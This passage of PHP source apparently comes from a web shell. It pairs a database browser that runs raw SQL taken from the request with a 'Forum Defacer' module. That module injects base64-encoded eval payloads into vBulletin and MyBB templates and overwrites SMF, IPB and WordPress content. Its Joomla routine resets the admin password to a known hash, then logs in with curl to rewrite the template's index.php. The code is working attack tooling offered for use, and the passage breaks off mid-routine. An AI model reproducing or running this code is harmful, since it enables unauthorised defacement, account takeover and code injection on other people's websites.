2889                     $fieldname = $field["Field"];
2890                     echo "<td><a href='$self?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>
2891                     ";
2892                     echo "</tr>
2893                     ";
2894                     }
2895                     echo "</table>";
2896                     echo "<div><font size=3>[ $dbname ]</font> - <font size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font class=txt size=3>[ Log Out ]</font> </a></div>";
2897                     }
2898                     
2899                     // Execute Query
2900                     if($_GET['action'] == "executequery")
2901                     {
2902                     $dbserver = $_COOKIE["dbserver"];
2903                     $dbuser = $_COOKIE["dbuser"];
2904                     $dbpass = $_COOKIE["dbpass"];
2905                     $dbname = $_GET['dbname'];
2906                     $tablename = $_GET['tablename'];
2907                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2908                     mysql_select_db($dbname);
2909                     $result = mysql_query($_GET['executemyquery']);
2910                     
2911                     //  results
2912                     echo "<html>
2913                     ". strtoupper($_GET['executemyquery']) . "<br>
2914                     <table border =\"1\">
2915                     ";
2916                     
2917                     $count = 0;
2918                     while ($row = mysql_fetch_assoc($result))
2919                     {
2920                     echo "<tr>
2921                     ";
2922                     
2923                     if ($count==0) // list column names
2924                     {
2925                     echo "<tr>
2926                     ";
2927                     while($key = key($row))
2928                     {
2929                     echo "<td><b>" . $key . "</b></td>
2930                     ";
2931                     next($row);
2932                     }
2933                     echo "</tr>
2934                     ";
2935                     }
2936                     
2937                     foreach($row as $r) // list content of column names
2938                     {
2939                     if ($r=='') $r = '<font class=txt>NULL</font>';
2940                     echo "<td>" . $r . "</td>
2941                     ";
2942                     }
2943                     echo "</tr>
2944                     ";
2945                     $count++;
2946                     }
2947                     echo "</table>
2948                     <font class=txt size=3>" . $count . " rows returned.</font>
2949                     </html>";
2950                     echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
2951                     }
2952                     
2953                     // View Table Data
2954                     if($_GET['action'] == "viewdata")
2955                     {
2956                     global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
2957                     $dbserver = $_COOKIE["dbserver"];
2958                     $dbuser = $_COOKIE["dbuser"];
2959                     $dbpass = $_COOKIE["dbpass"];
2960                     $dbname = $_GET['dbname'];
2961                     $tablename = $_GET['tablename'];
2962                     echo "<br><div><font size=3>[ $dbname ]</font> - <font size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font class=txt size=3>[ Log Out ]</font> </a></div>";
2963                     ?>
2964                     <br><br>
2965                     <form>
2966                     <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
2967                     <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
2968                     <input type="hidden" value="executequery" name="action">
2969                     <table>
2970                     <tr>
2971                     <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
2972                     </tr>
2973                     <tr>
2974                     <td><input type="submit" value="Execute" class="but"></td>
2975                     </tr>
2976                     </table>
2977                     </form>
2978                     <?php
2979                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2980                     mysql_select_db($dbname);
2981                     
2982                     $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
2983                     $row = mysql_fetch_array($sql);
2984                     $rowid = $row['COLUMN_NAME'];
2985                     
2986                     echo "<br><font size=4>Data in Table</font><br>";
2987                     if( $tablename != "" )
2988                     echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
2989                     else
2990                     echo "<font size=3 class=txt>$dbname</font><br>";
2991                     
2992                     $queryStr = "";
2993                     $pag = 0;
2994                     $queryStr = stripslashes( $queryStr );
2995                     if( $queryStr == "" )
2996                     {
2997                     if(isset($_REQUEST['page']))
2998                     {
2999                     $res = mysql_query("select * from $tablename");
3000                     $getres = mysql_num_rows($res);
3001                     $coun = ceil($getres/30);
3002                     if($_REQUEST['page'] != 1)
3003                     $pag = $_REQUEST['page'] * 30;
3004                     else
3005                     $pag = $_REQUEST['page'] * 30;
3006                     
3007                     $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
3008                     $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
3009                     $arrcount = 1;
3010                     $arrdata[$arrcount] = 0;
3011                     while($row = mysql_fetch_array($sql))
3012                     {
3013                     $arrdata[$arrcount] = $row[$rowid];
3014                     $arrcount++;
3015                     }
3016                     }
3017                     else
3018                     {
3019                     $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
3020                     $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
3021                     $arrcount = 1;
3022                     $arrdata[$arrcount] = 0;
3023                     while($row = mysql_fetch_array($sql))
3024                     {
3025                     $arrdata[$arrcount] = $row[$rowid];
3026                     $arrcount++;
3027                     }
3028                     }
3029                     if( $orderby != "" )
3030                     $queryStr .= " ORDER BY $orderby";
3031                     echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'><font size=3>Schema</font></a>
3032                     ";
3033                     }
3034                     
3035                     $pResult = mysql_query($queryStr );
3036                     $fieldt = mysql_fetch_field($pResult);
3037                     $tablename = $fieldt->table;
3038                     $errMsg = mysql_error();
3039                     
3040                     $GLOBALS[queryStr] = $queryStr;
3041                     
3042                     if( $pResult == false )
3043                     {
3044                     echoQueryResult();
3045                     return;
3046                     }
3047                     if( $pResult == 1 )
3048                     {
3049                     $errMsg = "Success";
3050                     echoQueryResult();
3051                     return;
3052                     }
3053                     
3054                     echo "<hr>
3055                     ";
3056                     
3057                     $row = mysql_num_rows( $pResult );
3058                     $col = mysql_num_fields( $pResult );
3059                     
3060                     if( $row == 0 )
3061                     {
3062                     echo "<font size=3>No Data Exist!</font>";
3063                     return;
3064                     }
3065                     
3066                     if( $rowperpage == "" ) $rowperpage = 30;
3067                     if( $page == "" ) $page = 0;
3068                     else $page--;
3069                     mysql_data_seek( $pResult, $page * $rowperpage );
3070                     
3071                     echo "<table cellspacing=1 cellpadding=5 border=1 class=pwdtbl align=center>
3072                     ";
3073                     echo "<tr>
3074                     ";
3075                     for( $i = 0; $i < $col; $i++ )
3076                     {
3077                     $field = mysql_fetch_field( $pResult, $i );
3078                     echo "<th>";
3079                     if($action == "viewdata")
3080                     echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>
3081                     ";
3082                     else
3083                     echo $field->name."
3084                     ";
3085                     echo "</th>
3086                     ";
3087                     }
3088                     echo "<th colspan=2>Action</th>
3089                     ";
3090                     echo "</tr>
3091                     ";
3092                     $num=1;
3093                     
3094                     
3095                     $acount = 1;
3096                     
3097                     for( $i = 0; $i < $rowperpage; $i++ )
3098                     {
3099                     $rowArray = mysql_fetch_row( $pResult );
3100                     if( $rowArray == false ) break;
3101                     echo "<tr>
3102                     ";
3103                     $key = "";
3104                     for( $j = 0; $j < $col; $j++ )
3105                     {
3106                     $data = $rowArray[$j];
3107                     
3108                     $field = mysql_fetch_field( $pResult, $j );
3109                     if( $field->primary_key == 1 )
3110                     $key .= "&" . $field->name . "=" . $data;
3111                     
3112                     if( strlen( $data ) > 30 )
3113                     $data = substr( $data, 0, 30 ) . "...";
3114                     $data = htmlspecialchars( $data );
3115                     echo "<td>
3116                     ";
3117                     echo "<font class=txt>$data</font>
3118                     ";
3119                     echo "</td>
3120                     ";
3121                     }
3122                     
3123                     if(!is_numeric($arrdata[$acount]))
3124                     echo "<td colspan=2>No Key</td>
3125                     ";
3126                     else
3127                     {
3128                     echo "<td><a href='$PHP_SELF?action=editData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename'>Edit</a></td>
3129                     ";
3130                     echo "<td><a href='$PHP_SELF?action=deleteData&$rowid=$arrdata[$acount]&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>
3131                     ";
3132                     $acount++;
3133                     }
3134                     }
3135                     echo "</tr>
3136                     ";
3137                     
3138                     
3139                     echo "</table>";
3140                     if($arrcount > 30)
3141                     {
3142                     $res = mysql_query("select * from $tablename");
3143                     $getres = mysql_num_rows($res);
3144                     $coun = ceil($getres/30);
3145                     echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
3146                     for($i=0;$i<$coun;$i++)
3147                     echo "<option value=$i>$i</option>";
3148                     
3149                     echo "</select> <input type=submit value=Go class=but></form>";
3150                     echo "<br><div><font size=3>[ $dbname ]</font> - <font size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font class=txt size=3>[ Log Out ]</font> </a></div>";
3151                     }
3152                     }
3153                     
3154                     // Delete Table Data
3155                     if($_GET['action'] == "deleteData")
3156                     {
3157                     $dbserver = $_COOKIE["dbserver"];
3158                     $dbuser = $_COOKIE["dbuser"];
3159                     $dbpass = $_COOKIE["dbpass"];
3160                     $dbname = $_GET['dbname'];
3161                     $tablename = $_GET['tablename'];
3162                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
3163                     mysql_select_db($dbname);
3164                     $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
3165                     $row = mysql_fetch_array($sql);
3166                     $row = $row['COLUMN_NAME'];
3167                     $rowid = $_GET[$row];
3168                     mysql_query("delete from $tablename where $row = '$rowid'");
3169                     header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
3170                     }
3171                     // Edit Table Data
3172                     if($_GET['action'] == "editData")
3173                     {
3174                     global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
3175                     $dbserver = $_COOKIE["dbserver"];
3176                     $dbuser = $_COOKIE["dbuser"];
3177                     $dbpass = $_COOKIE["dbpass"];
3178                     $dbname = $_GET['dbname'];
3179                     $tablename = $_GET['tablename'];
3180                     echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
3181                     ?>
3182                     <br><br>
3183                     <form action="<?php echo $self; ?>" method="post">
3184                     <input type="hidden" name="tablename" value="<?php echo $tablename; ?>">
3185                     <input type="hidden" name="action" value="editsubmitData">
3186                     <?php
3187                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
3188                     mysql_select_db($dbname);
3189                     
3190                     $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
3191                     $row = mysql_fetch_array($sql);
3192                     $row = $row['COLUMN_NAME'];
3193                     $rowid = $_GET[$row];
3194                     
3195                     $pResult = mysql_list_fields( $dbname, $tablename );
3196                     $num = mysql_num_fields( $pResult );
3197                     
3198                     $key = "";
3199                     for( $i = 0; $i < $num; $i++ )
3200                     {
3201                     $field = mysql_fetch_field( $pResult, $i );
3202                     if( $field->primary_key == 1 )
3203                     if( $field->numeric == 1 )
3204                     $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
3205                     else
3206                     $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
3207                     }
3208                     $key = substr( $key, 0, strlen($key)-4 );
3209                     
3210                     mysql_select_db( $dbname, $mysqlHandle );
3211                     $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
3212                     $data = mysql_fetch_array( $pResult );
3213                     
3214                     
3215                     echo "<input type=hidden name=dbname value=$dbname>
3216                     ";
3217                     echo "<input type=hidden name=tablename value=$tablename>
3218                     ";
3219                     echo "<input type=hidden name=$row value=$rowid>";
3220                     echo "<table cellspacing=1 cellpadding=2 border=1>
3221                     ";
3222                     echo "<tr>
3223                     ";
3224                     echo "<th>Name</th>
3225                     ";
3226                     echo "<th>Type</th>
3227                     ";
3228                     echo "<th>Function</th>
3229                     ";
3230                     echo "<th>Data</th>
3231                     ";
3232                     echo "</tr>
3233                     ";
3234                     
3235                     $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
3236                     $num = mysql_num_rows( $pResult );
3237                     
3238                     $pResultLen = mysql_list_fields( $dbname, $tablename );
3239                     
3240                     for( $i = 0; $i < $num; $i++ )
3241                     {
3242                     $field = mysql_fetch_array( $pResult );
3243                     $fieldname = $field["Field"];
3244                     $fieldtype = $field["Type"];
3245                     $len = mysql_field_len( $pResultLen, $i );
3246                     
3247                     echo "<tr>";
3248                     echo "<td>$fieldname</td>";
3249                     echo "<td>".$field["Type"]."</td>";
3250                     echo "<td>
3251                     ";
3252                     echo "<select name=${fieldname}_function class=sbox>
3253                     ";
3254                     echo "<option>
3255                     ";
3256                     echo "<option>ASCII
3257                     ";
3258                     echo "<option>CHAR
3259                     ";
3260                     echo "<option>SOUNDEX
3261                     ";
3262                     echo "<option>CURDATE
3263                     ";
3264                     echo "<option>CURTIME
3265                     ";
3266                     echo "<option>FROM_DAYS
3267                     ";
3268                     echo "<option>FROM_UNIXTIME
3269                     ";
3270                     echo "<option>NOW
3271                     ";
3272                     echo "<option>PASSWORD
3273                     ";
3274                     echo "<option>PERIOD_ADD
3275                     ";
3276                     echo "<option>PERIOD_DIFF
3277                     ";
3278                     echo "<option>TO_DAYS
3279                     ";
3280                     echo "<option>USER
3281                     ";
3282                     echo "<option>WEEKDAY
3283                     ";
3284                     echo "<option>RAND
3285                     ";
3286                     echo "</select>
3287                     ";
3288                     echo "</td>
3289                     ";
3290                     $value = htmlspecialchars($data[$i]);
3291                     $type = strtok( $fieldtype, " (,)
3292                     " );
3293                     if( $type == "enum" || $type == "set" )
3294                     {
3295                     echo "<td>
3296                     ";
3297                     if( $type == "enum" )
3298                     echo "<select name=$fieldname class=box>
3299                     ";
3300                     else if( $type == "set" )
3301                     echo "<select name=$fieldname size=4 class=box multiple>
3302                     ";
3303                     while( $str = strtok( "'" ) )
3304                     {
3305                     if( $value == $str )
3306                     echo "<option selected>$str
3307                     ";
3308                     else
3309                     echo "<option>$str
3310                     ";
3311                     strtok( "'" );
3312                     }
3313                     echo "</select>
3314                     ";
3315                     echo "</td>
3316                     ";
3317                     }
3318                     else
3319                     {
3320                     if( $len < 40 )
3321                     echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\" class=box></td>
3322                     ";
3323                     else
3324                     echo "<td><textarea cols=47 rows=3 maxlength=$len name=$fieldname class=box>$value</textarea>
3325                     ";
3326                     }
3327                     echo "</tr>";
3328                     }
3329                     echo "</table><p>
3330                     ";
3331                     echo "<input type=submit value='Edit Data' class=but>
3332                     ";
3333                     echo "<input type=button value='Cancel' onClick='history.back()' class=but>
3334                     ";
3335                     echo "</form>
3336                     ";
3337                     }
3338                     }
3339                     
3340                     // Edit Submit Table Data
3341                     else if($_REQUEST['action'] == "editsubmitData")
3342                     {
3343                     $dbserver = $_COOKIE["dbserver"];
3344                     $dbuser = $_COOKIE["dbuser"];
3345                     $dbpass = $_COOKIE["dbpass"];
3346                     $dbname = $_POST['dbname'];
3347                     $tablename = $_POST['tablename'];
3348                     
3349                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
3350                     mysql_select_db($dbname);
3351                     
3352                     $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname')  AND (`TABLE_NAME` = '$tablename')  AND (`COLUMN_KEY` = 'PRI');");
3353                     $row = mysql_fetch_array($sql);
3354                     $row = $row['COLUMN_NAME'];
3355                     $rowid = $_POST[$row];
3356                     
3357                     $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
3358                     $num = mysql_num_rows( $pResult );
3359                     
3360                     $rowcount = $num;
3361                     
3362                     $pResultLen = mysql_list_fields( $dbname, $tablename );
3363                     
3364                     
3365                     
3366                     for( $i = 0; $i < $num; $i++ )
3367                     {
3368                     $field = mysql_fetch_array( $pResult );
3369                     $fieldname = $field["Field"];
3370                     $arrdata = $_REQUEST[$fieldname];
3371                     
3372                     
3373                     $str .= " " . $fieldname . " = '" . $arrdata . "'";
3374                     $rowcount--;
3375                     if($rowcount != 0)
3376                     $str .= ",";
3377                     }
3378                     
3379                     $str = "update $tablename set" . $str . " where $row=$rowid";
3380                     mysql_query($str);
3381                     header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
3382                     }
3383                     else if(isset($_GET['logoutdb']))
3384                     {
3385                     setcookie("dbserver",time() - 60*60);
3386                     setcookie("dbuser",time() - 60*60);
3387                     setcookie("dbpass",time() - 60*60);
3388                     header("Location:$self?database");
3389                     }
3390                     
3391                     // Forum Manager
3392                     else if(isset($_REQUEST["forum"]))
3393                     { ?>
3394                     <center><table><tr><td><a href="<?php echo $self; ?>?forum&defaceforum">| Forum Defacer |</a></td>
3395                     <td><a href="<?php echo $self; ?>?forum&passwordchange">| Forum Password Changer |</a></td>
3396                     </tr></table></center><br>
3397                     <?php
3398                     if(isset($_REQUEST["defaceforum"]))
3399                     {
3400                     // Deface Forums
3401                     if(isset($_POST['forumdeface']))
3402                     {
3403                     if($_POST['forumdeface'] == "Hack VB")
3404                     {
3405                     $localhost =  $_POST['f1'];
3406                     $database =  $_POST['f2'];
3407                     $username =  $_POST['f3'];
3408                     $password =  $_POST['f4'];
3409                     $index    =  $_POST['index'];
3410                     $prefix    =  $_POST['prefix'];
3411                     
3412                     $con =@ mysql_connect($localhost,$username,$password);
3413                     $db =@ mysql_select_db($database,$con);
3414                     $index=str_replace('"','\"',$index);
3415                     $attack  = "{\${eval(base64_decode(\'";
3416                     $attack .= base64_encode("echo \"$index\";");
3417                     $attack .= "\'))}}{\${exit()}}</textarea>";
3418                     if($prefix == "" || $prefix == null)
3419                     $query = "UPDATE template SET template = '$attack'";
3420                     else
3421                     $query = "UPDATE ".$prefix."template SET template = '$attack'";
3422                     $result =@ mysql_query($query,$con);
3423                     if($result)
3424                     {
3425                     echo "<center><font size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
3426                     }
3427                     else
3428                     {
3429                     echo "<center><font class=txt size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
3430                     }
3431                     }
3432                     else if($_POST['forumdeface'] == "Hack MyBB")
3433                     {
3434                     $localhost =  $_POST['f1'];
3435                     $database =  $_POST['f2'];
3436                     $username =  $_POST['f3'];
3437                     $password =  $_POST['f4'];
3438                     $index    =  $_POST['index'];
3439                     $prefix    =  $_POST['prefix'];
3440                     
3441                     $con =@ mysql_connect($localhost,$username,$password);
3442                     $db =@ mysql_select_db($database,$con);
3443                     $attack  = "{\${eval(base64_decode(\'";
3444                     $attack .= base64_encode("echo \"$index\";");
3445                     $attack .= "\'))}}{\${exit()}}</textarea>";
3446                     $attack  = str_replace('"',"\'",$attack);
3447                     
3448                     if($prefix == "" || $prefix == null)
3449                     $query = "UPDATE mybb_templates SET template = '$attack'";
3450                     else
3451                     $query = "UPDATE ".$prefix."templates SET template = '$attack'";
3452                     $result =@ mysql_query($query,$con);
3453                     if($result)
3454                     {
3455                     echo "<center><font size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
3456                     }
3457                     else
3458                     {
3459                     echo "<center><font class=txt size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
3460                     }
3461                     }
3462                     else if($_POST['forumdeface'] == "Hack SMF")
3463                     {
3464                     $localhost =  $_POST['f1'];
3465                     $database =  $_POST['f2'];
3466                     $username =  $_POST['f3'];
3467                     $password =  $_POST['f4'];
3468                     $index    =  $_POST['index'];
3469                     $head    =  $_POST['head'];
3470                     $catid    =  $_POST['f5'];
3471                     $prefix    =  $_POST['prefix'];
3472                     
3473                     $con =@ mysql_connect($localhost,$username,$password);
3474                     $db =@ mysql_select_db($database,$con);
3475                     if($prefix == "" || $prefix == null)
3476                     $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3477                     else
3478                     $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3479                     $result =@ mysql_query($query,$con);
3480                     if($result)
3481                     {
3482                     echo "<center><font size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
3483                     }
3484                     else
3485                     {
3486                     echo "<center><font class=txt size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
3487                     }
3488                     }
3489                     else if($_POST['forumdeface'] == "Hack IPB")
3490                     {
3491                     $localhost =  $_POST['f1'];
3492                     $database =  $_POST['f2'];
3493                     $username =  $_POST['f3'];
3494                     $password =  $_POST['f4'];
3495                     $index    =  $_POST['index'];
3496                     $head    =  $_POST['head'];
3497                     $catid    =  $_POST['f5'];
3498                     
3499                     $IPB = "forums";
3500                     $con =@ mysql_connect($localhost,$username,$password);
3501                     $db =@ mysql_select_db($database,$con);
3502                     $query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'";
3503                     $result =@ mysql_query($query,$con);
3504                     if($result)
3505                     {
3506                     echo "<center><font size=4><blink>Forum Defaced Successfully</blink></font></center>";
3507                     }
3508                     else
3509                     {
3510                     echo "<center><font class=txt size=4><blink>Cannot Deface Forum</blink></font></center>";
3511                     }
3512                     }
3513                     else if($_POST['forumdeface'] == "Hack wordpress")
3514                     {
3515                     $localhost =  $_POST['f1'];
3516                     $database =  $_POST['f2'];
3517                     $username =  $_POST['f3'];
3518                     $password =  $_POST['f4'];
3519                     $catid = $_POST['f5'];
3520                     $index    =  $_POST['index'];
3521                     $head    =  $_POST['head'];
3522                     $prefix    =  $_POST['prefix'];
3523                     
3524                     $con =@ mysql_connect($localhost,$username,$password);
3525                     $db =@ mysql_select_db($database,$con);
3526                     if($prefix == "" || $prefix == null)
3527                     {
3528                     if(isset($_POST["all"]) && $_POST["all"] == "All")
3529                     $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
3530                     else
3531                     $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
3532                     }
3533                     else
3534                     {
3535                     if(isset($_POST["all"]) && $_POST["all"] == "All")
3536                     $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
3537                     else
3538                     $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
3539                     
3540                     }
3541                     $result =@ mysql_query($query,$con);
3542                     if($result)
3543                     {
3544                     echo "<center><font size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3545                     }
3546                     else
3547                     {
3548                     echo "<center><font class=txt size=4><blink>Cannot Deface WordPress</blink></font></center>";
3549                     }
3550                     }
3551                     else if($_POST['forumdeface'] == "Hack Joomla")
3552                     {
3553                     $localhost =  $_POST['f1'];
3554                     $dbname =  $_POST['f2'];
3555                     $username =  $_POST['f3'];
3556                     $password =  $_POST['f4'];
3557                     $dbprefix =  $_POST['prefix'];
3558                     $site_url = $_POST['siteurl'];
3559                     $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
3560                     
3561                     $co=randomt();
3562                     
3563                     $link=mysql_connect("localhost",$username,$password) ;
3564                     
3565                     mysql_select_db($dbname,$link);
3566                     
3567                     $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
3568                     
3569                     $req =mysql_query("SELECT * from  `".$dbprefix."extensions` ");
3570                     
3571                     if ( $req )
3572                     {
3573                     $req =mysql_query("SELECT * from  `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
3574                     $data = mysql_fetch_array($req);
3575                     $template_name=$data["template"];
3576                     
3577                     $req =mysql_query("SELECT * from  `".$dbprefix."extensions` WHERE name='".$template_name."'");
3578                     $data = mysql_fetch_array($req);
3579                     $template_id=$data["extension_id"];
3580                     
3581                     $url2=$site_url."/index.php";
3582                     
3583                     $ch = curl_init();
3584                     curl_setopt($ch, CURLOPT_URL, $url2);
3585                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3586                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3587                     curl_setopt($ch, CURLOPT_HEADER, 1);
3588                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3589                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3590                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3591                     
3592                     
3593                     $buffer = curl_exec($ch);
3594                     
3595                     $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
3596                     $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
3597                     
3598                     
3599                     $url2=$site_url."/index.php";
3600                     $ch = curl_init();
3601                     curl_setopt($ch, CURLOPT_URL, $url2);
3602                     curl_setopt($ch, CURLOPT_POST, 1);
3603                     curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
3604                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3605                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3606                     curl_setopt($ch, CURLOPT_HEADER, 0);
3607                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3608                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3609                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3610                     $buffer = curl_exec($ch);
3611                     
3612                     $pos = strpos($buffer,"com_config");
3613                     if($pos === false)
3614                     {
3615                     echo("<br>[-] Login Error");
3616                     exit;
3617                     }
3618                     
3619                     $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
3620                     $ch = curl_init();
3621                     curl_setopt($ch, CURLOPT_URL, $url2);
3622                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3623                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3624                     curl_setopt($ch, CURLOPT_HEADER, 0);
3625                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3626                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3627                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3628                     $buffer = curl_exec($ch);
3629                     
3630                     $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
3631                     if(!$hidden2)
3632                     {
3633                     echo("<br>[-] index.php Not found in Theme Editor");
3634                     exit;
3635                     }
3636                     
3637                     $url2=$site_url."/index.php?option=com_templates&layout=edit";
3638                     
3639                     $ch = curl_init();
3640                     curl_setopt($ch, CURLOPT_URL, $url2);
3641                     curl_setopt($ch, CURLOPT_POST, 1);
3642                     curl_setopt($ch, CURLOPT_POSTFIELDS,"jform1=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
3643                     
3644                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3645                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3646                     curl_setopt($ch, CURLOPT_HEADER, 0);
3647                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3648                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3649                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3650                     $buffer = curl_exec($ch);
3651                     
3652                     $pos = strpos($buffer,'<dd class="message message">');
3653                     if($pos === false)
3654                     {
3655                     echo("<center><font class=txt size=4><blink>Cannot Deface Joomla</blink></font></center>");
3656                     
3657                     }
3658                     else
3659                     {
3660                     echo("<center><font size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3661                     }
3662                     
3663                     }
3664                     else
3665                     {
3666                     $req =mysql_query("SELECT * from  `".$dbprefix."templates_menu` WHERE client_id='0'");
3667                     $data = mysql_fetch_array($req);
3668                     $template_name=$data["template"];
3669                     
3670                     $url2=$site_url."/index.php";
3671                     $ch = curl_init();
3672                     curl_setopt($ch, CURLOPT_URL, $url2);
3673                     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3674                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3675                     curl_setopt($ch, CURLOPT_HEADER, 1);
3676                     curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3677                     curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3678                     curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
